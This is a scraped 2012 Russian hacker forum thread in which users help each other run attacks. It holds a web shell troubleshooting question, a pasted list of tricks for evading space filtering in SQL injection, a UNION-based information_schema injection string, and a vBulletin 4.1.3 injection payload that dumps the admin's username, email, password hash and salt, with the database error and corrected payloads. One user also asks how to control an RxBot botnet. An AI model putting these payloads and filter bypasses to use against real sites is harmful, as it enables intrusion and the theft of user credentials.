12.03.2012, 19:49
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
Я вас наверно уже задолбал)
ну ладно)
при открытии мини-шелла с кодом:
получается вот такая петрушка при ?cmd=phpinfo() и так далее:
либо unexpected $end
либо T_STRING
system не катит, так как disallow.
в чем подвох? |
|
|
12.03.2012, 19:58
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от stan0009
Я вас наверно уже задолбал)
ну ладно)
при открытии мини-шелла с кодом:
получается вот такая петрушка при ?cmd=phpinfo() и так далее:
либо unexpected $end
либо T_STRING
system не катит, так как disallow.
в чем подвох? ?cmd=phpinfo() ;
|
|
|
|
12.03.2012, 20:07
|
|
Участник форума
Регистрация: 30.07.2010
Сообщений: 118
С нами:
8308406
Репутация:
0
|
|
если бы. так при любых командах
я догадываюсь что дело в сервере
|
|
|
|
12.03.2012, 20:37
|
|
Постоянный
Регистрация: 16.10.2011
Сообщений: 326
С нами:
7670486
Репутация:
76
|
|
Сообщение от None
Сообщение от faza02
там где [ ], что должно быть, чтобы выполнилось верно?
фильтрация на + /**/ %0a и остальное
Вот такое нагуглил, может, что-нибудь подойдет в твоем случае
PHP код:
[COLOR="#000000"][COLOR="#0000BB"]Q[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Нашел sql[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]инъекцию[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]но злые админы поставили на фильтрацию на пробел[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]Существуют ли аналоги пробела в sql[/COLOR][COLOR="#007700"]-[/COLOR][COLOR="#0000BB"]запросах[/COLOR][COLOR="#007700"]?
[/COLOR][COLOR="#0000BB"]A[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]Еще как существуют[/COLOR][COLOR="#007700"]![/COLOR][COLOR="#0000BB"]Вот наиболее часто применяемые способы для замены пробела[/COLOR][COLOR="#007700"]:
+[/COLOR][COLOR="#0000BB"]или[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]2B[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]табуляция[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#0000BB"]или[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]09[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]возврат каретки[/COLOR][COLOR="#DD0000"]" "[/COLOR][COLOR="#0000BB"]или[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]0D[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]перевод строки[/COLOR][COLOR="#007700"]%[/COLOR][COLOR="#0000BB"]0A[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]коментарий[/COLOR][COLOR="#FF8000"]/**/
[/COLOR][COLOR="#0000BB"]скобки[/COLOR][COLOR="#007700"]:[/COLOR][COLOR="#0000BB"]select[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]from[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]users[/COLOR][COLOR="#007700"])[/COLOR][COLOR="#0000BB"]where[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]id[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"])[/COLOR][/COLOR]
Сообщение от None
если бы. так при любых командах
я догадываюсь что дело в сервере
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]
[/COLOR][/COLOR]
Поэкспериментируй с этими.
|
|
|
|
13.03.2012, 01:02
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
С нами:
9721141
Репутация:
1013
|
|
Сообщение от None
union(select(1),2,3,table_name,5,(6)from(informati on_schema.tables)limit+1,1)
как тут в конце заменить на скобки?
|
|
|
|
13.03.2012, 03:53
|
|
Участник форума
Регистрация: 13.11.2010
Сообщений: 184
С нами:
8155766
Репутация:
2
|
|
Ребята!!) Подскажите как управлять RxBot в мирке (Botnet)
|
|
|
|
13.03.2012, 12:38
|
|
Новичок
Регистрация: 14.07.2011
Сообщений: 10
С нами:
7805846
Репутация:
0
|
|
Нашел эксплоит на exploit-db.com для Vbulletin 4.1.3
Код:
&messagegroupid[0]=3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1
а DB мне в ответ вот так:
Код:
Invalid SQL:
SELECT socialgroup.name
FROM socialgroup AS socialgroup
WHERE socialgroup.groupid IN (3) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1);
MySQL Error : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ')' at line 3
Вопрос: как победить эту долбаную скобку в конце? |
|
|
|
13.03.2012, 12:46
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Добавить вот здесь:
&messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1
|
|
|
|
13.03.2012, 12:53
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
тогда нужно сделать так
&messagegroupid[0]=3) UNION (SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt )) FROM user WHERE userid=1
|
|
|
|
13.03.2012, 12:57
|
|
Постоянный
Регистрация: 30.08.2010
Сообщений: 327
С нами:
8263766
Репутация:
11
|
|
Сообщение от faza02
как тут в конце заменить на скобки?
подкорректируй свой вопрос,а то не понятно и всмысле в конце скобки,поставь правильно вопрос
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
